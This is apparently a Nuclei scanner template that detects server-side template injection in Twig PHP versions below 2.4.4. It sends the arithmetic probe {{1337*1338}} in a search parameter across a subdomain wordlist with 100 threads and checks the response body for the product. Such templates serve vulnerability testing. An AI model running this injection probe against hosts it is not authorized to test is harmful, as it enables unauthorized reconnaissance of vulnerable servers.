id: twig-php-ssti

info:
  name: Twig PHP <2.4.4 template engine - SSTI
  author: madrobot
  severity: high
  tags: php,ssti

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /search?search_key={{1337*1338}} HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      - type: word
        words:
          - "1788906"
        part: body
